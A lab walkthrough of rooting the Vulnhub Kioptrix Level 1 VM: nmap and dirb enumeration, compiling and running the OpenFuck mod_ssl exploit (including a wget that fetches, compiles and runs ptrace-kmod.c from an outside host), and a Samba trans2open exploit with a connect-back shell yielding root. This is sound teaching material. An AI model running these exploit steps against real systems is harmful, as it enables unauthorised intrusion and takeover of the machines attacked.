Vulnhub: Kioptrix (#1) Writeup

kioprtix

In this kioptrix walkthrough writeup, I will walk you through my methodology for rooting a Vulnhub VM known as Kioptrix (#1). This is part 1 of the Kioptrix series and is intended to teach beginners the basics of boot2root challenges.

IP Address Information

Kali IP address: 192.168.178.24
Kioptrix IP address: 192.168.178.20

Procedures

1. To start off, let’s perform a TCP SYN port scan with service discovery using nmap to identify open ports on the target machine

root@kali:~# nmap -sS -sV 192.168.178.20
Starting Nmap 7.60 ( https://nmap.org ) at 2018-25-03 11:38 +08
Nmap scan report for 192.168.178.20
Host is up (0.00090s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:FC:57:B1 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.13 seconds

2. Seeing that port 80 and 8080 is open, let’s run the http-enum nse script for HTTP enumeration.

root@kali:~# nmap -Pn -p 80,443 --script http-enum 192.168.178.20
Starting Nmap 7.60 ( https://nmap.org ) at 2018-25-03 11:40 +08
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.178.20
Host is up (0.00027s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum:
|_ /test.php: Test page
443/tcp open https
MAC Address: 00:0C:29:FC:57:B1 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 19.79 seconds

Found a test.php page.

3. Next, let’s check out test.php to see if there is a possible entry point

CTF – Kioptrix Level 1 – Walkthrough step by step
CTF – Kioptrix Level 1 – Walkthrough step by step

Looks like a dead end.

4. To enumerate further, let’s run dirb to discover other interesting directories and pages.

root@kali:~# dirb http://192.168.178.20
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun March 25 11:43:01 2018
URL_BASE: http://192.168.178.20/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.178.20/ ----
+ http://192.168.178.20/~operator (CODE:403|SIZE:273)
+ http://192.168.178.20/~root (CODE:403|SIZE:269)
+ http://192.168.178.20/cgi-bin/ (CODE:403|SIZE:272)
+ http://192.168.178.20/index.html (CODE:200|SIZE:2890)
==> DIRECTORY: http://192.168.178.20/manual/
==> DIRECTORY: http://192.168.178.20/mrtg/
==> DIRECTORY: http://192.168.178.20/usage

5. Next, let’s try to browse around the discovered pages and directories.

CTF – Kioptrix Level 1 – Walkthrough step by step

CTF – Kioptrix Level 1 – Walkthrough step by step

From the page above, we can confirm that the installed Apache version is 1.3.20 and the installed mod_ssl version is 2.8. This is the same versions indicated on the results of the initial port scan.

6. Since we didn’t find any possible entry points on the web application itself, let’s try to search for an existing exploit for either Apache 1.3.20 or mod_ssl 2.8.

root@kali:~# searchsploit mod_ssl 2.8
---------------------------------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms/)
---------------------------------------------------------------------- ----------------------------------
Apache mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow | multiple/dos/21575.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Exploit | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Exploit | unix/remote/764.c
---------------------------------------------------------------------- ----------------------------------

Nice! There is an existing remote exploit for mod_ssl 2.8 version. Let’s use the OpenFuckV2 exploit, sounds fascinating.

7. Next, we have to prepare the exploit and check if any modification is needed.

root@kali:~/Desktop/Kioptrix# cp /usr/share/exploitdb/platforms/unix/remote/764.c .

root@kali:~/Desktop/Kioptrix# gcc 764.c -o 764 -lcrypto
764.c:20:10: fatal error: openssl/ssl.h: No such file or directory
 #include <openssl/ssl.h>
 ^~~~~~~~~~~~~~~
compilation terminated.

Bummer! We need to modify a few things to compile this exploit.

First off, we need to add the following headers:

#include <openssl/rc4.h>
#include <openssl/md5.h>

Next, search for “wget” using your favorite text editor and replace

http://packetstormsecurity.nl/0304-exploits/ptrace-kmod.c

to

http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

Next, we need install libssl1.0-dev

apt-get install libssl1.0-dev

Next, we need to search for “unsigned char *p” and update the declaration from

unsigned char *p, *end;

to

const unsigned char *p, *end;

Lastly, let’s try to compile the exploit.

root@kali:~/Desktop/Kioptrix# gcc 764.c -o OpenFuck -lcrypto

8. If compilation is successful, all we need to do is execute the exploit.

root@kali:~/Desktop/Kioptrix# ./OpenFuck 0x6b 192.168.178.20 -c 40

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
Good Bye!

Disclaimer: So I tried to execute this exploit several times but unfortunately it didn’t work for me. Based on my research, this exploit is really unreliable but somehow it worked for others. I didn’t want to spend so much time on this exploit so I tried to find another way in.

Update: I tried this exploit later and i got root

root@kali:~/Desktop/Kioptrix# ./OpenFuck 0x6b 192.168.178.20 -c 40

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$ 
exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; net/0304- 
--06:57:25--  http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:80... connected!
HTTP request sent, awaiting response... 301 Moved Permanently
Location: https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c [following]
--06:57:26--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]

    0K ...                                                   100% @   3.74 MB/s

06:57:27 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]

/usr/bin/ld: cannot open output file p: Permission denied
collect2: ld returned 1 exit status
is
/bin/sh: is: command not found
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

uname -a
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown

 

9. Since the exploit for mod_ssl didn’t worked, let’s proceed to look for another way in. We can enumerate port 139 (samba) via enum4linux.

root@kali:~/Desktop/Kioptrix# enum4linux 192.168.178.20
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun March 25 12:33:26 2018
==========================
| Target Information |
==========================
Target ........... 192.168.178.20
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
<-------------------------------TRUNCATED------------------------------->
 =========================================== 
|    Share Enumeration on 192.168.178.20   |
 =========================================== 
WARNING: The "syslog" option is deprecated
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]

	Sharename       Type      Comment
	---------       ----      -------
	IPC$            IPC       IPC Service (Samba Server)
	ADMIN$          IPC       IPC Service (Samba Server)

	Server               Comment
	---------            -------
	KIOPTRIX             Samba Server

	Workgroup            Master
	---------            -------
	MYGROUP              KIOPTRIX
<-------------------------------TRUNCATED------------------------------->

From the results, we can note that the Samba is version 2.2.1a.

10. Let’s search for an existing exploit for Samba version 2.2.1a.

root@kali:~/Desktop/Kioptrix# searchsploit samba 2.2
---------------------------------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms/)
---------------------------------------------------------------------- ----------------------------------
(Linux Kernel 2.6) Samba 2.2.8 (Debian / Mandrake) - Share Privilege | linux/local/23674.txt
Samba 2.0.x/2.2 - Arbitrary File Creation | unix/remote/20968.txt
Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit) | osx/remote/9924.rb
Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit) (1) | linux/remote/16321.rb
Samba 2.2.8 (BSD x86) - 'trans2open' Overflow Exploit (Metasploit) | bsd_x86/remote/16880.rb
Samba 2.2.8 (Linux x86) - 'trans2open' Overflow (Metasploit) | lin_x86/remote/16861.rb
Samba 2.2.8 (OSX/PPC) - 'trans2open' Overflow (Metasploit) | osx_ppc/remote/16876.rb
Samba 2.2.8 (Solaris SPARC) - 'trans2open' Overflow (Metasploit) | solaris_sparc/remote/16330.rb
Samba 2.2.8 - (Brute Force Method) Remote Command Execution | linux/remote/55.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1) | unix/remote/22468.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (2) | unix/remote/22469.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (3) | unix/remote/22470.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (4) | unix/remote/22471.txt
Samba 2.2.x - 'nttrans' Overflow (Metasploit) | linux/remote/9936.rb
Samba 2.2.x - Buffer Overflow | linux/remote/7.pl
Samba 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overfl | unix/remote/22356.c
Samba < 2.2.8 (Linux/BSD) - Remote Code Execution | multiple/remote/10.c
---------------------------------------------------------------------- ----------------------------------

11. Next, let’s try to compile the remote code execution exploit for Samba < 2.2.8 (Linux/BSD).

root@kali:~/Desktop/Kioptrix# gcc 10.c -o 10
root@kali:~/Desktop/Kioptrix# ./10
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
Usage: ./10 [-bBcCdfprsStv] [host]

-b  bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)
-B  bruteforce steps (default = 300)
-c  connectback ip address
-C  max childs for scan/bruteforce mode (default = 40)
-d  bruteforce/scanmode delay in micro seconds (default = 100000)
-f force
-p  port to attack (default = 139)
-r  return address
-s scan mode (random)
-S  scan mode
-t  presets (0 for a list)
-v verbose mode

12. Finally, let’s execute the exploit with our IP as the callback address and the Kioptrix IP as the target.

root@kali:~/Desktop/Kioptrix# ./10 -c 192.168.178.24 -b 0 192.168.178.20
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)

/bin/sh -i
sh: no job control in this shell
sh-2.05# whoami
root

Got root!

That’s it! Thanks for reading and I hope you learned something new today. Cheers!

Never miss a post. Follow and Share on: